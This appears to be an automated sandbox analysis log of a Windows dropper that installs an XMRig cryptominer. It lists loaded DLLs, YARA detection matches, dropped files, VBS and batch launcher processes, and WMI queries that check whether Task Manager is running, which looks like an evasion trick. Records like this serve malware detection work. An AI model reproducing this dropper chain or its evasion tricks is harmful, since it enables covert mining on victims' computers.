Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: userenv.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: powrprof.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: umpdc.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: mswsock.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: napinsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: pnrpnsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: wshbth.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: nlaapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: winrnr.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: explorerframe.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
Source: 6.3.6.exe.1b665fa72bc.1.raw.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000015.00000000.1542891226.00007FF750E91000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000006.00000003.1507397894.000001B665FA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: Process Memory Space: 6.exe PID: 4272, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: xmrig.exe PID: 1308, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: WinRing0x64.sys.6.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.mine.winEXE@428/22@6/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329B6F0 GetLastError,FormatMessageW,LocalFree, 0_2_00007FF73329B6F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B8284 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00007FF7332B8284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\6.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7120125
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs"
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\timeout.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE'
